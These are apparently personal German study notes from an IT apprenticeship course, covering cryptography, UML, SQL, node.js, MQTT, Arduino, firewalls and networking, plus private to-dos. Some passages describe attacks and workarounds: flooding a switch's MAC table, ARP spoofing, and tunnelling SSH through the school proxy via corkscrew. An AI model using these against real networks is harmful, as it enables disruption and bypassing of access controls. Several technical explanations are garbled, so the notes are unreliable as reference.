1=3¹ mod 13=3hoch6v mod 13=3hoch 9 mod 13=3 hoch 12 mod 13 ergibt eins. Es gibt auch den Diffie-Helmann-Merkle-Schlüsselaustausch wieder ipsec: ike(Internet-Key-Exchange-Protokoll) = als aggressiver mode und mainmode betreibbar

Ipsec und PGP: Die zertifikatsbasierte Authentisierung verwendet X.509-Zertifikate und ist im Wesentlichen eine Public- Key-Infrastruktur, wie sie auch für SSL und S/MIME verwendet wird. PGP-Zertifikate sind ein anderer Ansatz und können hierfür nicht verwendet werden.

Mit Ipsec kommt man auch in VPN rein. Sowohl openVPN und Ipsec geht in VPN. Es sind zwei verscheidene Wege.

Hat man ein Modem, kann man ein Direkt-VPN machen, von Rechner zu Rechner!

IKE SA während filmen: ipsec Vergleiche vom Esp(Encapsulated Security Payload)-header im transportmodus und esp-header im tunnelmodus der empfänger liest sich vergleichsdaten im esp-heder aus, ob das gesamtpaket(tcp, oder udp) original ist, nicht verändert wurde. Seq-nr(im esp-header, auch im authentification header), payload(länge), padding(Fülldaten, müssen gewisse länge haben, wird mit fülldaten ergänzt).

Sequenziell= hochzähle. Wenn es mehrfach sequenznummer geschicht wird, versucht jemand was, was unterzujubeln.

Diffie-helmann verfahren ist kein Protokoll, diese routine kann sowohl in der Anwendungsschicht, als auch für das VPN eingesetzt werden.

Außer Textnachrichten lassen sich auch andere Arten von Information verschlüsseln, wie Sprachnachrichten, Bildaufzeichnungen oder der Quellcode von Programmen.

14.2.2017 Programmierung: UML, Diagrammtypen mit antje Osten

Datenbanken werden zum dritten Mal wiederholt.

XML verstehen. Gibt es in HTML, nicht nur Android. Antje sagt: Wiederholen.

Virenarten.

Was neu sein wird: Spiralmodell. Meilensteine, Phasenmodelle 3-4 Tage Modelle ..

Diagrammtypen UML

Strukturdiagramme

Objektdiagramm

Klassendiagramm (Aus dem Internet):“Das Klassendiagramm ist wahrscheinlich eines der Diagramme, welches zum großen Erfolg von UML beigetragen haben."

Auch hier schön einfach erklärt: https://www.der-wirtschaftsingenieur.de/index.php/klassendiagramm-class-diagramm/

Sichtbarkeiten: Methoden, Membervariablen und Übung

Assoziationen und Multiplizitäten: Aggregat, Komposition, Unidirektional, Bidirektional, nicht naavigierbar

Klassendiagramme mit Vererbung is -a = ist erweitert zur mutterklasse has -a = is instance of = wenn ein objekt mit klasse verknüpft ist

Paketdiagramm

Strukturdiagramme

Komponentendiagramm

Verteilungsdiagramm mit Übung

-

Das V-Modell Wasserfallmodell..

Kurze Wiederholung symetrisches und asymetrisches Verschlüsselungsverfahren.

Er-Modell

Relationenmodell

Daten und Funktionen zu Objekten zusammenfassen

15.2.2017 UML mit Antje

Antje erklärt eigentlich sehr gut und einleuchtend; man muss sich wirklich nur voll und ganz auf sie konzentrieren und nicht, wenn es “langweilig” wird, was anderes machen.

Herr Wenke ist der datenbankler in diesem Haus.

UML: Es gibt Akteure (z.B. Männchen). Aber bitte ohne Haare.

Gestern hatten wir Diagrammtypen.

Hatten Klassendiagramm.

2017_Projektidee Samstag azsgedruckt mitbringen. Treffen: wo?

Aktivitätsdiagramm

Typisierung(Informatik) statisch: dynamisch: programmdatei = binary

Malware (Malicious Software): Malware ist ein Überbegriff für mehrere Schadprogramme: Ich vermute, malware ist einfach nur der englische Begriff für Schadprogramm Dazu gehören: Viren, braucht ein Wirtsprogramm Bootsektor-Virus:Lagert sich vor dem Bootvorgang Stealth-Virus: hängen sich an emails dran und hat vor der datei ewas code, damit er mit gestartet wird. Hashwert einer datei kontrollieren ist absicherung(dateigröße verändert) Beagle-Virus: makrovirus: scriptviren: js-injection; dann kam plöätzlich was unaufgefordertes; sql-injection ist eigentlich auchein scriptvirus, aber nicht unter dem term scriptvirus.

Würmer, eigenständig (braucht den User, der ihn aufrufen)

Trojaner, Backdoor,

Spyware,

Adware, d unngeforderte Werbung

Scareware, etwas, was verunsichern soll

Ransomware, Erpressersoftware immer ein gutes Backup haben, nicht zahlen Alle halbe Stunde immer ein gutes Backup an Bord

Greyware. Das ist im halblegalen Bereich, es tut nicht weh, es nervt Dialer: Hoax(Werbemail) (ist eine Art Kettenbrief) wird per emailadressen weitergeschickt, dann kriegt man spams. Mail: Bilder nur auf Anfrage einstellen. Was, es gibt auch briefe, die wirklich sind. Dann blöd.

Sql-injection und email injection unbedingt googlen

..

Sequenzdiagramm

Kollaborationsprogramm

Relationle Datenbnken Sie sprechen alle echt SQL

Objektorientierte Datenbanken redundanz und mehrfachweg inkonsistenz manche datensätze fehlen, oder passen nicht Abfrage & Manipulation: DQL, DML, Verwaltung: DDL Berechtigungssteuering select * from tabelle1 as + 1 join tabelle2 as +2 on t1.id=t2.id

Data manipulation Language insert into tabelle_cd (nr, Titel, Datum)..

Update tabelle_cd set nr=4 where Datum='1888';

Delete from tabelle_cd where titel ='name'; where nicht vergesen create erschafft .. alter table name add land; verändert die spalten delete = tabelle noch da, inhalt weg

DCL: grant und revoke datentypen: decimal, int, float(), varchar, date, row(), boolean, number, er-modell, kasten um wörter (objekte) machen wenn ich datensatz habe, erschent das objekt in der liste viren seien keine malware

Relationale Datenbank: Hier werden die Daten in Tabellen gespeichert. Die Tabellen stehen zueinander in Beziehung, in einer Relation. Die Relation wird über sogenannte Fremdschlüssel (foreign Key) hergestellt. Prominente Vertreter des relationalen Datenbankmodells: Oracle, MySQL

Nachteil: Mit Erhöhung der Anzahl der abgefragten Segmente verringert sich die Performanz der Abfrageverarbeitung.

Das Genre und die Bücher hatte ich gerade ohne Fremdschlüssel zusammen bekommen (nachdem ich die G_ID mit “update buecher set G_id='2' where G_id='0';” geupdatet hatte): select * from genre g, buecher b where g.G_id = b.G_id; Jetzt sind aber alle Bücher Phantasy! Das kann man damit ändern: UPDATE buecher SET G_id=3 WHERE B_id='2'; Jetzt ist beim Dateneintrag unter B_id=2 in der Spalte G_id der Wert 3.

Table Bücher vergrößert: ALTER TABLE buecher ADD A_id int(10) NOT NULL; Zeigt zu allen Büchern auch alle Autoren an, die KEIN Buch laut Tabelle buecher veröffentlich haben select * from autor a left join buecher b on a.A_id = b.A_id;

Hier sind alle drei Tables passend verknüpft: select * from genre g LEFT JOIN buecher b ON g.G_id = b.G_id LEFT JOIN autor a ON a.A_id = b.A_id ORDER BY a.A_id; Trotz Nachbar-Terror ein Erfolgserlebnis: Ich war kurz vorm durch drehen!

Wenn man die gewünschten Spalten direkt auswählt, hat man hinterher ein schöneres Ergebnis: select g.G_name, a.A_Vorname, a.A_name, b.B_name, b.B_jahr from genre g LEFT JOIN buecher b ON g.G_id = b.G_id LEFT JOIN autor a ON a.A_id = b.A_id ORDER BY a.A_id; http://www.peterkropff.de/tutorials/php_mysql_3/php_mysql_3.htm

Notation ist die Benennung von Gegenständen durch das Festhalten (qualitative und quantitative Repräsentation) von Dingen und Bewegungsverläufen in schriftlicher Form mit vereinbarten symbolischen Zeichen.

UML wird als Ersatz für ER-Diagramme benutzt. Liebe Antje, schlag mich ńicht tot, aber ich hab vieles nicht verstanden: is – a beziehungen?? Vererbung!

statisch: wieso soll agathe ein integer sein? (unter UML-Unterkategorie Objektdiagramm) Wieso heißt das Rückgabewert? (unter UML-Unterkategorie Klassendiagramm) get und set ist immer statisch, oder? (?wo? Ich hatte es irgendwo mal gelesen)

Statische Methoden, Membervariablen

Aber ich kann diese ganzen Diagramme imme rnoch nicht auseinander halten !!

Assoziationen und Multiplizitäten Verbindungen von Instanzen einer Klasse.. ..mit Aggregation und Komposition da werden auch die kardinalitäten zwischen den klassen z.b. 1 zu n angegeben und ein assoziationsname in der Mitte der Linie

Implementierungsdiagramme sind u.A. Komponentendiagramme (für serverlandschaften) <> und in sich verleibte komponenten mit Paketen

Verteilungsdiagramm aua, <> und artefakte wie <

Installation node.js – Server: shift+ctrl+v = in die shell einfügen

Aus zeit.de – Artikel über “Zukunftsangst”: “Algorithmen, intelligente Software und Roboter können immer mehr Dinge, zu denen noch vor Kurzem allein der Mensch fähig war. Sie verarbeiten nicht nur rasant wachsende Datenmengen, sondern lesen Texte, verstehen Sprache, erkennen Gesichter und analysieren in Echtzeit ihre Umgebung – etwa um selbstständig Auto zu fahren.“

Wissenschaft: “Bedeutende Fortschritte in der Wissenschaft sind meist auf neue Beobachtungen zurückzuführen, die wiederum erst dank neuer technologischer Entwicklungen möglich geworden sind. Mal ist es Glück, mal passiert es, weil Menschen verschiedener Disziplinen ihre Ideen zusammenwerfen, und manchmal, weil sie sich auf ein Problem konzentrieren, das bis dahin als zu schwierig galt und deshalb keine Aufmerksamkeit bekommen hat.”

/usr/lib/nodejs

Nodejs starten: root@deb-saiyajin:/home/max/myapp#nodejs chat.js

Geschriebens im Browser beobachten: http://localhost:3000/

Mit anderen chatten z.B. Manuel: http://192.168.22.42:3000/

Auf den PC zu Hause zugreifen: in der ssh config:

Host max HostName server ip von zuhause User max Port 443 #IdentityFile ~/.ssh/id_rsa ProxyCommand corkscrew 192.168.22.254 3128 %h %p

Mein ssh-port zu hause muss 443 sein, sonst funktioniert es nicht. http://www.zdnet.de/41527895/corkscrew-so-tunnelt-man-ssh-durch-http-proxies/ meine config funktioniert nicht richtig node.js ist auch nichts anderes als ein ajax-call npm-manager entweder global .. npm-init json file anlegen local emit = ausliefern weiter an angemeldeten real right rule .. port nicht immer ausliefer. http://localhost/chat/chat.php insert join mehrere tabellen insert .. Ich hatte mir irgendwo von einer Website mit einen insert-join den link kopiert, vielleicht auch in das php- programm “ausgabe-mehrverknuepfter-tabelle.php” http://stackoverflow.com/questions/12073513/insert-using-left-join-and-inner-join cool: https://www.heise.de/newsticker/meldung/Jungbastler-fahren-mit-selbstgebauten-Gefaehrt-durch-die-Stadt- 3634307.html

PHP: JSON = serialisierung von php-variablen; nützlich im Zusammenspiel mit ajax .. cool: PHP kann ZIP auslesen und Dateien in ZIP packen !! Ab PHP 4.0 hat die Sprache auch einen Compiler. https://wiki.debian.org/wl unter tinywindows: account.live.com muss man sich telefonisch freischalten lassen lebara one-burner-karte verwenden, um account wieder frei zu schalten

Die Aktiengesellschaft wird im Commonwealth-Bereich (u.A. Hongkong) “Limited” genannt.

26.2.2017

- Meinen Einkommensnachweis einscannen

- Aktuelle Gasrechnung mit ausdrucken, wenn ich am Donnerstag (vor oder nach dem Amtsgericht) zum Arbeitsamt gehe, um die Sache mit der Ausbildung zu outen.

- Zudem den Brief mitbringen, wo drinsteht, wo ich noch Schulden habe. Für meine Website: Den Title aller Seiten mit php-Variablen verlinken, um es 1. nur einmal schreiben zu müssen und 2. die Sprache sich ändert, wenn die Spracheinstellungen geändert werden

Idee für die Aswang-Seite: Die ganzen alten Seiten nach oben, daneben einen “Home”-button. Die Phantasyromane in die Linkliste; die bei Responsive unten laden tut.

Für die Seiten mit den Phantasyromanen: Der gleiche sticky Header wie auf der Front-Homepage; jedesmal wird der “Home-Button” treu mit dem Lese-Fortschritt mithalten.. .

Es gibt unter php noch switch .. . (spracheinstellung) was ist das??

Sticky Header: https://www.youtube.com/watch?v=utonytGKodc

http://www.famr.eu/Mandanteninformationen/Kosten/Beratungs- _und_Prozesskostenhilfe/Notwendige %20Unterlagen

Nicht vergessen: den ajax-Ordner mit dem Zeug, was wir letzte Woche gemacht hatten.

27.2.2017 json mit Antje dzaisän..

- Arduino mit Ethernet-Child

- nodejs für leichte sachen, darin sehr schnell

- Arduino: format für daten packen und entpacken programm mit geraden strichen: csv aales was wir in js mchen ist in vornherein json json: php, ruby: in jeder Sprache einen Parser .. raus fischen bibliothek packt, parser entpackt gebaut:json-call json ist in ajax in sich

Erstes Skript: Daten nachladen xml ist älter und schwerfälliger als json.. aber trotzdem gibt es einen Grund, dass wir xml machen .. allein, weil wir es können müssen ?? weil ¾ der austuschformate im Web (serverkonfigurationsdatein) nich in xml sind wir müssen xml und json-parser können

..es geht beim mosquito nicht um peer to peer ..

Film mit domus aurea: john wick teil 2 Nützliche Liste: https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers

Um den mosquitto-server zu starten (er lauscht dann): root@deb-saiyajin:/var/www/html/mqtt# node mqtt.js Browser mit: “localhost:5000” aufmachen

Als (simulierter) Arduino senden: root@deb-saiyajin:/home/max# mosquitto_pub -h localhost -t fromArduino -m "Hallo hier bin ich"

28. 2. 2017 IoT, Basteln mit Arduino mit Antje

Arduino = Physical-Computing-Plattform. und über shell (Arduino) mit server (Browser) kommunizieren!

- Port 1883 ist ungesichert ..

- Broker ist nicht mosq ..

- visuelle Oberfläche (html) für Zugriff auf arduino

- nodejs kommt als json packet ..

- niemals iframe von einem anderen server ziehen

- man kann den mqtt überall hilegen und starten ..

- guter html-editor

- antje setzt gerade zu viel strom auf leuchte

- aarduino: c .. c binär ..

- uno kann auch gebastelt werden .. man muss ide für installieren ..

.. “Arduino bringt eine eigene integrierte Entwicklungsumgebung (IDE) mit. Dabei handelt es sich um eine Java-Anwendung, die für die gängigen Plattformen Windows, Linux und MacOS kostenlos verfügbar ist. Sie basiert auf der IDE von Processing, einer auf die Einsatzbereiche Grafik, Simulation und Animation spezialisierten Entwicklungsumgebung. Die Arduino-IDE bringt einen Code-Editor mit und bindet gcc als Compiler ein. Zusätzlich werden die avr- gcc-Library und weitere Arduino-Librarys eingebunden, die die Programmierung in C und C++ stark vereinfachen.”

OS auf dem Arduino:

int led 9 void setup() { } .. von antje raus geben lassen ..

Der Mikrocontroller ist mit einem Bootloader vorprogrammiert, wodurch die Programmierung direkt über die serielle Schnittstelle ohne externes Programmiergerät erfolgen kann.

Antje hat einen Arduino Uno mit einem ETH-Anschluss.

Arduino – ip: 192.168.123.165

Server bei Antje: /var/www/html/elise/index.html

- erstmal nicht skript, das das lämpchen auf arduino bedient

- sondern “topic” erstmal …

- kleines skript drauf laden wie das klassenzimmer an den ard hängen?

1.3.2017 Raspberry Pi, UML - Editor mit Antje fg Abschlussprojekt; was mit sounds.

Shell: User einer anderen Gruppe zufügen Den User max der Gruppe www-data hinzufügen: usermod -aB www-data max zustandsdiagramm

Antje nutzt latex

Jeder musste so einen open-source-UML-Editor installieren .. Astah starten: astah-pro http://astah.net/faq/professional/how-to-run-astah-on-linux

/usr/share/java java -jar plantuml.jar -testdot root@deb-saiyajin:/usr/share/java# java -jar plantuml.jar

Ich sollte einen Alternativeditor zu Astah installieren... – xml als Sandardsprache für uml-Programme? “Der Austausch von Modellen und Diagrammen zwischen verschiedenen Modellierungswerkzeugen stellt alle Kandidaten vor ein Problem: Zwar existieren mit XMI (XML Metadata Interchange) und UXF (UML Exchange Format) standardisierte Formate, der Transfer von Daten funktioniert aufgrund herstellerspezifischer Erweiterungen jedoch nur selten.” 2.3.2017 Firewall mit Mathias Rüdiger

Christian aus der Klasse im Atelier sagt, dass die Volkshochschule Neukölln (Verbund) Anwendungsentwickler sucht.

Ich soll bis Montag bei ihm eine recht formlose Bewerbung abgeben, mit Lebenslauf usw .. .

Unterschied Software- und Hardwareverschlüsselung

Alle pakete kommen rein, Fw muss vergleichsprozess durch setzen .. baut normalerweise: zwei firewalls .. andere von anderer firma, für eine gute dmz zu empfehlen wenn wlans über einem router zusammenführen: automatisch zusammen. Kann nicht unterscheiden .. er kennt nur das zielnetz.

Hw-firewall: nur bis osi 3 (bis dahin auch router geht) sw FW: 7 ist iptables auch kreuzbär .. fassbrause

Firewall sieht ethernetframe → MAC ist drin.

Bei ip sagt er: ist schon vergeben. Bei macadresse nicht.

Wenn mac beim eigenen router reinkommt, mac von anderem router. Welcher Bereich vom IP-Header wird von der FW beeinflußt?

Solche Grafiken immer in *.jpg konvertieren!

Woher erkenne ich das echte Paket?

Muss wissen, ob udp- oder tcp aufgerufen wird, nummer mit rerin zu eth. Ich bin arp, ipv6, ipv6 – in typ von eth eingetragen.

Was macht FW an TCP. 3 Wege-Handshake. Seq wird um paketgröße hochgezählt, wo man erkennt, dass es richtig ist und kein fakepaket. Meine seq-nr dazu. Puffer werden hochgez bis voll, seq wird dann hochgez. Ack immer gleich.

Die FW nutzt das Tcp aus anhand der seq. nr und empf. nr und d. flex. 2 Richtungen beim programmieren der FW .. hin und richtung zurück.

.. der proxy kann den ges. Datenbestand prüfen, er cache't den datenbestand. Virenprüfung kann er. Defender.

Prüffaktoren (von oben nch unten): Quell- und Ziel-IP; Typ (Protokoll-) Feld Ethernet

Protokoll-Nr (um ggf. Das ganze Protokoll zu blocken) .. heisst protokollfeld im ip-header = protok., im tcp = typ .. jedes bit ist ein flag.

Seq- und Ack- Nr. Flags Quell- unf Zielport in der headerprüfung unterscheiden sich hard- und softwareprüfung nicht.

Mikroelektronik und informatik studiert

MS Word: Überschriften markieren, im 'Start' – Reiter auf “Überschrift klicken”, dann das Inhaltsverzeichnis aktualisieren, fertig.

Wie Daten bewusst mit FW blocken:

Googlen: E-Books bei udp kommt was rein, der port

------| Typfeld vom ETH |ziel/Quell-IP | port: 4011 | DNS – Daten | ------| | | | | ------quellport: über1024, nein alle

------| Typfeld vom ETH |ziel/Quell-IP | 443 / | DNS – Daten | ------| | | | | ------udp: schickt einfach raus und weg (schneller) tcp: kümmert sich um hin und zurück.

Wenn fw ip blockt, ist alles geblockt. Was ist noch offen? Arp.

Was kann man mit ?arp? nicht? Hopsen, über den Router springen. Um Drucker im anderen Netzwerk zu erreichen: Ghostscript arp: Ist ein Programm, das die MAC bereit stellt ?? Ich dachte immer, dass Protokolle direkt in den Paketen des Internets enthalten sind und z.B. von einem Computer zum switch gehen und zurück.

- Das Arp bleibt die ganze Zeit im Computer? Netzwerkkarte .. ganz am anfang zurecht zu wissen .. aktiviert nur zu Anfang, (ARP sendet BC raus) dann verbleibt es als Tabelle. Es schickt eine Anfrage ins ganze Netzwerk. Das ARP-Protokoll legt zu diesem Zweck Mapping-Tabellen an, die die MAC-Adressen den Netzwerkadressen zuordnen.”

Weil auf Schicht eins und 2 nur mac-adressen laufen, muss die ip in eine mac übersetzt werden. Das übernimmt das ARP. IP-Nummern von Internetservern werden nicht in diese arp-tabelle eingetragen. Weil inetserver hinter routern verborgen .. Die ARP zeigt nur die IP's vom LAN an (den Gateway, andere Rechner, den BC, usw..) Arp-Request und Arp-Response. Die MAC's sind im Ethernet-Header (Schicht 1) und die IP 's im ip-header. Wenn Rechner ins internet geht, steht als Zieladresse trotzdem die MAC vom router drin .. nur die ip vom rechner jenseits des routers ist vorhanden .. im ip-header. wort unicast gefallen, antwort auf BC im ARP. Arp-response ohne arp-request kann verschickt werden .. schwachstelle, wäre arp-spoofing

Alle Pakete, die eigentlich zu h1 gesendet werden sollen, könnten zu h2 gesendet werden, wenn h2 Angreifer ist! Man-in-the-middle

Die TTL ist bei Schicht 3 entscheidend. Icmp-protokoll.

Nachhilfe!!

Hr rüdiger redet nur mit denen, die von routing Ahnung haben .. alle anderen ignorieren das, anscheinend .. Intigritätsgeschützt: Übergabe des passworts und dass das paket nicht geändert wurde. 1 bit; hashwert komplett verändert.

Eigentlich müsste ich den ganzen Untericht filmen, um Fragen zu notieren !!!

Virtuelles Netzwerke?

Wie funktioniert das mit dieser Tabelle; Protokoll, z-ip, q-ip, z-port, q-port usw .. ??

Was hatte der DNS mit all dem zu tun ??

UDP: Eine Einbahnstraße?

Ich hab jetzt die letzten zehn Minuten ihm zugehört und trotzdem nichts verstanden.

Icmp-protokoll.. in schicht 3?

Ethernet bleibt im lan. Kann Antje uns mal in ein Framework einführen?? → hab firmen gesehen, die Leute suchen, die Frameworks (z.B. Hiberante) beherrschen !!

Ich hab auch dauernd Angst, irgendwas falsch zu machen. Sich von Unternehmen finden lassen ?? https://www.get-in-it.de/it-einstiegsprogramme/p16000-1e7438f7/1e7438f7? utm_source=indeed&utm_medium=cpc&utm_campaign=launch-basic O_o ..

3.3.2017: Coaching: JavaScript und Hackers Lounge

Coaching: Auf google chrome am MAC: cmd + alt + j = dieses inspect element aufrufen Das "Speichern unter"-Fenster im MAC ist gleichzeitig der Dateimanager. alt + 89 = geschweifte klammer unter mac cmd+n unter brackets neue brackets-konsole öffnen. den ordner auf brackets schieben; alles öffnet sich!

Browser: Operatoren unter js .. kann man unter “inspect element” in der Console aufrufen: 4 + 4 = 8; js = number statt int =(Gleichheitszeichen) Zuweisungsoperator. 5>6 false .. boolean. 5=5 .. invalid, weil da muss an linker Seite eine Variable stehen. 5==5 .. true. Strenger .. 5===5 .. true "fgfd", "565346" .. String 3=="3" .. true, was nicht sein kann, weil "3" Zeichenkette ist. 3==="3" … false. Das ist der Unterschied zwischen == und ===, weil "3" ist ein String. "Donald Trumo".length .. 12 .. Die Methode .length zeigt an, wieviele Character der String “Donald Trumo”hat. Funktioniert nicht bei number, z.b. 3.length.

Bracket= editor, wie eclipse .. cross-plattform, nicht nur für mac plugins für java und c++ auch möglich

Emmet: ! + tap = grundsätz. HTML kommt raus geschossen, braucht emmet-plugin für notepad++ geht auch emmet.io/download/ auch für eclipse und notepad++ http://emmet.io/download/ emmet cheat cheet farbe markieren (hex) = cmd+e = farbe ändern. div*3>$$ … macht drei divs mit zahlen. ... dann kann man auch externe css verändern mit cmd + e verändern, wenn man im body auf div, oder p, geht. fofa .. font family mit allem drum und dran transition: 1s all ease; dann cmd + e drücken .. . cubic-bezier.com

Guter Tipp: crazy cool websites codepen http://codepen.io/ csstricks tanford css - kurse kostenlos stanford it lessons online

Gregor guckte: the girl with all the gifts

An Martin S.(Hackers Lounge): - Installation plugin manager failed bei notepad++ .. notepad++ hat das plugin yes - auch bei brackets .. hängt das mit der 32-bit-version von win zusammen? - Tastatur windows auf Englisch true yes - keine Webcam, kein Mikro bei Skype aktiviert - debian stürzt bei rechner auf arbeit dauernd ab - der sticky header bzw. das jquery kommt sich mit dem restlichen Javascript auf meiner neuen Website in die Haare. Gelöst yes - Was ist der Untersschied zw. Hub und Switch? Weil, obwohl der Switch weiß, wohin das Paket geht, … . Mathias sagte am Freitag, dass er selber keine Routing-Tabellen speichern kann (irritiert).

Martin: „ein switch wertet die ziel-mac aus dem paketheader (ethetnet frame) aus und sendet das paket nur an den port wo er die ziel-mac vorher schon gesehen hat. .. routing tabellen sind in switches nur rudimentär vorhanden .. der switch hat ne tabelle von 4k oder 8k zuletzt gesehenen mac-adressen .. wenn ein paket auf einem port rein kommt für ziel-mac schon bekannt dann geht bei nem switch dieses paket nur auf dem einen port wieder raus wo die mac schon gesehen wurde .. wenn auf einem anderen port ein paket für eine andere auch schon bekannte mac rein kommt dann wird es auch gezielt weiter gesehdet .. routing ist dem switch fremd .. er weiß nur welche absender-macs an welchen ports sind, und kann das zielrouting gezielt machen .. ja, switches haben eine mac-tabelle mit Xkilo einträgen .. d.h. wenn jemand nen haufen fakes mit immer neuen macs auf den switch wirft, dann kann mensch den switch auch zu einem hub degradieren bis das gerät sich resettet .. wenn ein paket VON einer bestimmten mac kommt, dann weiß der switch daß das nächste paket mit dieser ziel-mac auf diesen port muss .. also wenn man viele Broadcasts auslöst, resetten sich der switch, oder? .. nja, broiadcast ist nicht alles, aber das printip ist daß du nen paar tausend pakete an deinem port erzeugst die angeblich verschiedene absender haben .. irgendwann ist der mac-table von dem switch voll und er wird zum hub oder resettet sich .. solange du einen switch nicht mit macs überfährst dann kann er die x mal 100mbit schaffen an seinen ports .. wird dann auch die Durchlassgeschwindigkeit von 100mbit geringer? .. 100mbit bleiben 100mbit .. switches haben keine skripte, das ist noch wesentlich unter "browser"

An Antje: Nodejs-server geht nicht mehr.

DOM hat: Masterelemente, subelemente .. wenn man da durch blickt, hat man volle Kontrolle.

Obwohl ich so besoffen und bekifft war, hatte ich es geschafft, den js-bildwechsel und ein css-bildwechsel umzubauen. Dann half mir martin weiter, bei einer sache, die ich eigentlich schon gewusst hatte: Die rEihenfolge zu ändern, so dass das css vom interpreter streng heirachisch zuerst abgearbeitet wurde und dann das query mit sticky header abgearbeitet werden konnte, in meinem php-Skript. Martin half mir, dass in Worte zu fassen: es nannte sich DOM; Document Object Model. Gemeinsam schafften wir, dass es funktionierte: Dass css + der query-sticky-slider auf der Website liefen. Martrin meinte sogar am Schluss von sich aus, dass ich mich gerne über pdgin bei ihm melden könne, geschichte rüber schicken, .. mal sehen, in helfen bei it auch gut, besonders gut usw.. . js ist eine programmiersprache. Für html und css hatte martin ein anderes wort, aber nicht skriptsprache. Containersprache evtl.. .

Schichtenmodell DOD: Bei dem DoD sind die Daten in jeder Schicht vorhanden(logisch). Gelangen sie in die Transportschicht, klebt sich der TCP-Header dran mit seiner Nachricht, dann das IP mit seinen Paketen, dann der MAC-Header mit seinen Frames, und dann die Hardware, so recht ich das verstehe.

Sehr sehr nützlich: https://www.tinohempel.de/info/info/netze/osi.htm

„..Für jede Schicht wiederum gibt es Regeln (Protokolle) die angeben, wie die Daten verarbeitet werden. Für den Datenaustausch stehen Dienste über Schnittstellen zur Verfügung. Dadurch erreicht man eine hohe Flexibilität, denn die einzelne Schichten können durch eigene Protokolle angepasst, geändert oder ausgetauscht werden, etwa für die Anpassung an ein Übertragungsmedium. ..“

Schicht 2: „..Zugriffsprotokoll (Ethernet, Token Ring, …)..“ Hub ist nur auf Schicht 1! Switch nimmt noch die Sicherungsschicht (2) mit! Der router geht bis zu 3 (Vermittlungsschicht) hoch!

Auch sehr erhellend: https://de.wikipedia.org/wiki/Schichtenarchitektur https://upload.wikimedia.org/wikipedia/commons/1/14/OSI7Layer_model_3.1.svg Schichtenmodelle gibt es auch bei Betriebssystemen.

Die dreischichten-Architektur ist was anderes als das Schichtenmodell: „Die dreischichtige Architektur (englisch three tier architecture) ist eine Architektur, die softwareseitig drei Schichten hat. Im Gegensatz zur zweischichtigen Architektur existiert bei der dreischichtigen Architektur noch eine zusätzliche Schicht, oftmals die Logikschicht (?Domäne?), welche die Datenverarbeitung vornimmt.“ Gui → Logik → Data. .. von unten nach oben.

Auch eine gute Erklärung: http://www.mrknowing.com/2013/11/08/wie-funktioniert-die-3-schichten-architektur/

Was ich eigentlich wissen wollte war beim Generationenmodell, wo Netzwerksachen wie Protokolle mit den Assembler und der OOP zusammen stoßen. Stattdessen ist jetzt lauter (sehr interessanter und erhellender) Netzwerkkram beim googlen raus gekommen, Schnittstelle zum Betriebssystem nicht gefunden wie erhofft. Jetzt habe ich das gegooglete Wort „Schichten“ weg genommen. Jetzt gibt es überhaupt nix zu „Generationenmodell“, was in meine Richtung geht.

Liebe liebe Antje, diese Schleife funzt nicht: for($i = 0; $j = 0; $i<3; ++$i; $j<2) { echo $i,$j;

}

Warum?? habe immer noch nicht den Unterschied zwischen has-a und is-a – Beziehung verstanden kann david mir ipv6-subnetting erklären?

Gregor fragen, was er gegen Exzem macht. Sonst rufe ich in der Frühstückspause die TK an.

(Linkliste mit all diesen Spielereien, die sie mit uns programmierte hier rein..)!

Volkshochschule Neukölln (Verbund) sucht Anwendungsentwickler .. Bewerbung bei Christian im Atelier abgeben !! youtube: dmz, ipv6, inodes,

Internetprotokollfamilie durch lesen.

Firewall: Wie funktioniert das mit dieser Tabelle; Protokoll, z-ip, q-ip, z-port, q-port usw .. ?? Was hatte der DNS mit all dem zu tun ??

UDP: Eine Einbahnstraße?

Es gibt objektorientierte und prozedurale Programmiersprachen, aber dann kommen relationale Datenbanken z.B. MySQL. Ist MySQL nun objektorientiert, oder prozedural? Von Javascript weiß ich noch, dass es objektorientiert ist. Allerdings ist es auch funktional.

?? DBS – relationale Datenbanksysteme .. mit objektwrapper objektorientierte Spachen ablegen. ?? Objektorientiertes Datenbanksysteme .. wurde nicht die Zukunft.

IHK-relevant: Die nullte Normalform muss vorliegen und jedes Attribut muss atomar (unteilbar) sein. Also, dass Tabellen nicht mehr gebrochen werden können, oder?

MAC-Adressen und IP's sind Binärbefehle, die keiner Programmiersprache unterliegen, vermute ich mal. Das gleiche könnte für Protokolle gelten. Aber, wie interagiert z.b. das ARP-Protokoll in der Netzwerkkarte mit dem Rest des Computers? Über einem Assembler?? new retro wave https://www.youtube.com/watch?v=rSGnNMnvM6M

6.3.2017 Backup – Programm entwerfen mit Jörg Schirmer

Programm planen, Programmablaufplan erstellen und technisch umsetzen .. Thanatchai und ich. weil Antje ihre Zahn-OP hatte, waren die AE heute bei den Systemintegratoren

7. 3. 2017 Einführung in Schichtenarchitekturen und MVC mit Antje Osten

Vormittag: Java Theorie Unterschied zwischen: schichtenarchitektur und model view controller

Schichtenarchitektur (Auch ein Paradigma):

3 -Schichtenarchitektur: Programm wird in drei Teile getreilt. Die grafik- logik- dataschicht. Bauen von unten nach oben auf, sollen in eine Richtung Abhängigkeiten vermeiden.

Auch wenn die Grafikschicht, die abhängigste von allen ist, ist es die die am einfachsten zu ändern ist. Vielleicht merkt man es sich so, dass man sagt “Die Grafikschicht ist deswegen so abhängig, da alle Änderungen an anderen Schichten eine direkte Auswirkung am Grafik-Layer haben”. GUI: Hier werden alle Steuerelemente und grafischen Komponenten platziert. Zu dem werden die Event-Handler (Button-Click, Mouse-Over usw.) definiert. In den Events werden jedoch selber keine Berechnungen vorgenommen. Diese rufen lediglich die Funktionen aus dem Logik-Layer auf. - steuerelemente - graf. Komponenten - event-handler - ruft logik auf

LOGIK: Hier werden sämtliche Methoden zu Berechnungen und umgesetzte Algorithmen implementiert. Jedoch werden keine Datenquellen direkt angesteuert. Braucht man Daten aus einer Datenbank, oder von Webservices usw. wird die Datenschicht angesteuert. - Methoden zur berechnung - umgesetzte algorithmen - keine Datenquellen angesteuert

DATEN: In der Datenschicht werden alle Methoden verankert die Daten direkt aus einer Datenquelle lesen. Dies könnten Methoden sein die mittels SQL Datenbank-Abfragen machen, Methoden welche APIs von Webservices ansteuern oder sogar Methoden welche ganz simple Daten aus Dateien (Excel csv, Textdatei usw.) lesen. - Methoden verankert - machen SQL-Abfragen - Daten ausgelesen

Die Kommunikation zwischen den einzelnen Schichten stellen die Rückgabewerte der einzelnen Methoden dar.

Model view Controller:

